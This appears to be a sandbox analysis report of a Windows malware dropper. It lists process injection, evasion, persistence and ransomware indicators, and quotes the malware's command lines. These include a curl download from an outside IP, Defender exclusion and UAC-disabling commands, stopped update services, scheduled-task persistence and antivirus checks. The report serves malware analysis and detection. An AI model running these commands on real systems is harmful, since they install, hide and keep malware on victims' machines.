N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 816 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe
PID 816 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe
PID 816 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe
PID 2652 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
PID 2652 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
PID 2652 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe
PID 816 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
PID 816 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
PID 816 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
PID 656 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
PID 656 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
PID 656 wrote to memory of 3252 N/A C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
PID 816 wrote to memory of 312 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe
PID 816 wrote to memory of 312 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe
PID 816 wrote to memory of 312 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe
PID 312 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe C:\Windows\SysWOW64\cmd.exe
PID 312 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe C:\Windows\SysWOW64\cmd.exe
PID 312 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe C:\Windows\SysWOW64\cmd.exe
PID 1888 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1888 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1888 wrote to memory of 1924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1888 wrote to memory of 3632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1888 wrote to memory of 3632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1888 wrote to memory of 3632 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1888 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1888 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1888 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1888 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1888 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1888 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 816 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\4.exe
PID 816 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\4.exe
PID 816 wrote to memory of 868 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\4.exe
PID 1888 wrote to memory of 1596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1888 wrote to memory of 1596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1888 wrote to memory of 1596 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1888 wrote to memory of 4892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1888 wrote to memory of 4892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1888 wrote to memory of 4892 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1888 wrote to memory of 4164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1888 wrote to memory of 4164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1888 wrote to memory of 4164 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1888 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
PID 1888 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
PID 1888 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif
PID 1888 wrote to memory of 4608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1888 wrote to memory of 4608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1888 wrote to memory of 4608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 816 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\3dismhost.exe
PID 816 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\3dismhost.exe
PID 816 wrote to memory of 2912 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\3dismhost.exe
PID 944 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif C:\Windows\SysWOW64\cmd.exe
PID 944 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif C:\Windows\SysWOW64\cmd.exe
PID 944 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif C:\Windows\SysWOW64\cmd.exe
PID 2140 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
PID 2140 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
PID 2140 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
PID 2140 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
PID 2140 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
PID 2140 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
PID 2140 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
PID 2140 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
PID 2140 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe
PID 2140 wrote to memory of 708 N/A C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe

"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"

C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe

"C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe"

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe

"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"

C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Users\Admin\AppData\Local\Temp\Files\4.exe

"C:\Users\Admin\AppData\Local\Temp\Files\4.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 768318

C:\Windows\SysWOW64\findstr.exe

findstr /V "PhoneAbcSchedulesApr" Nbc

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Challenged + Diy + Teachers + California + Mba + Yarn + Payable + Zdnet + Plumbing + Pe + Trick + Betting + Absence + Motorcycles + Man + Analyst + Max + Patrick + Pg + Exemption + Sight 768318\B

C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif

768318\Paraguay.pif 768318\B

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\Files\3dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\Files\3dismhost.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & echo URL="C:\Users\Admin\AppData\Local\TradeInsight Technologies\TradeWise.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & exit

C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe

"C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"

C:\Users\Admin\AppData\Local\Temp\Files\2020.exe

"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"

C:\Users\Admin\AppData\Local\Temp\Files\2020.exe

"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe

C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe

C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe

C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe

"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"

C:\Users\Admin\AppData\Local\Temp\Files\mi.exe

"C:\Users\Admin\AppData\Local\Temp\Files\mi.exe"

C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif

C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe

"C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe"

C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe

"C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c pHash.bat

C:\Windows\system32\curl.exe

curl -o "pHash" "http://144.172.71.105:1338/nova_flow/patcher.exe?hash"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\VdjkHVtJ.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VdjkHVtJ" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDAAB.tmp"

C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe

"C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe"

C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe

"C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Impacts Impacts.bat & Impacts.bat

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 578678

C:\Windows\SysWOW64\findstr.exe

findstr /V "PEACEFOLKSEXUALISLANDS" Hill

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Webpage + ..\Von + ..\Exotic + ..\Relief + ..\Seo + ..\Serious + ..\Myth y

C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif

Cooper.pif y

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe

"C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe"

C:\Users\Admin\AppData\Local\Temp\Files\pei.exe

"C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"

C:\Users\Admin\AppData\Local\Temp\Files\iupdate.exe

"C:\Users\Admin\AppData\Local\Temp\Files\iupdate.exe"

C:\Users\Admin\AppData\Local\Temp\3188116601.exe

C:\Users\Admin\AppData\Local\Temp\3188116601.exe

C:\Windows\sysnldcvmr.exe

C:\Windows\sysnldcvmr.exe

C:\Users\Admin\AppData\Local\Temp\223522870.exe

C:\Users\Admin\AppData\Local\Temp\223522870.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Windows\system32\reg.exe

reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f

C:\Windows\system32\schtasks.exe

schtasks /delete /f /tn "Windows Upgrade Manager"

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\543810920.exe

C:\Users\Admin\AppData\Local\Temp\543810920.exe

C:\Users\Admin\AppData\Local\Temp\1657333799.exe

C:\Users\Admin\AppData\Local\Temp\1657333799.exe

C:\Users\Admin\AppData\Local\Temp\864131738.exe

C:\Users\Admin\AppData\Local\Temp\864131738.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe

"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"

C:\Users\Admin\AppData\Local\Temp\1487620755.exe

C:\Users\Admin\AppData\Local\Temp\1487620755.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\dwm.exe

C:\Windows\System32\dwm.exe

C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\Files\install2.exe

"C:\Users\Admin\AppData\Local\Temp\Files\install2.exe"

C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe

"C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe"

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\Files\kxfh9qhs.exe

"C:\Users\Admin\AppData\Local\Temp\Files\kxfh9qhs.exe"

C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe

"C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"

C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe

"C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"

C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe

"C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"

C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe

"C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"

C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\Files\aqbjn3fl.exe

"C:\Users\Admin\AppData\Local\Temp\Files\aqbjn3fl.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4848 -ip 4848

C:\Users\Admin\AppData\Local\Temp\Files\IATInfect2008_64.exe

"C:\Users\Admin\AppData\Local\Temp\Files\IATInfect2008_64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'

C:\Users\Admin\AppData\Local\Temp\Files\leto.exe

"C:\Users\Admin\AppData\Local\Temp\Files\leto.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe

C:\Users\Admin\AppData\Local\Temp\Files\DriverHost.exe

"C:\Users\Admin\AppData\Local\Temp\Files\DriverHost.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Sync.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Sync.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4468 -ip 4468

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 184

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe

"C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe"

C:\Users\Admin\AppData\Local\Temp\Files\sam.exe

"C:\Users\Admin\AppData\Local\Temp\Files\sam.exe"

C:\Users\Admin\AppData\Local\Temp\Files\defender64.exe

"C:\Users\Admin\AppData\Local\Temp\Files\defender64.exe"

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe

"C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"

C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe

"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"

C:\Users\Admin\AppData\Local\Temp\Files\r2.exe

"C:\Users\Admin\AppData\Local\Temp\Files\r2.exe"

C:\Users\Admin\AppData\Local\Temp\Files\steel.exe

"C:\Users\Admin\AppData\Local\Temp\Files\steel.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe"

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\Files\pghsefyjhsef.exe

"C:\Users\Admin\AppData\Local\Temp\Files\pghsefyjhsef.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Users\Admin\AppData\Local\Temp\Files\LoadNew.exe

"C:\Users\Admin\AppData\Local\Temp\Files\LoadNew.exe"

C:\Users\Admin\AppData\Local\Temp\Files\ATLEQQXO.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ATLEQQXO.exe"

C:\Users\Admin\AppData\Local\Temp\pyexec.exe

"C:\Users\Admin\AppData\Local\Temp\pyexec.exe"

C:\Users\Admin\AppData\Local\Temp\Files\ew.exe

"C:\Users\Admin\AppData\Local\Temp\Files\ew.exe"

C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe

"C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"

C:\Users\Admin\AppData\Local\Temp\Files\Rage.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Rage.exe"

C:\Users\Admin\AppData\Local\Temp\Files\s.exe

"C:\Users\Admin\AppData\Local\Temp\Files\s.exe"

C:\ProgramData\wvtynvwe\AutoIt3.exe

"C:\ProgramData\wvtynvwe\AutoIt3.exe" C:\ProgramData\wvtynvwe\clxs.a3x

C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\Files\M5iFR20.exe

"C:\Users\Admin\AppData\Local\Temp\Files\M5iFR20.exe"

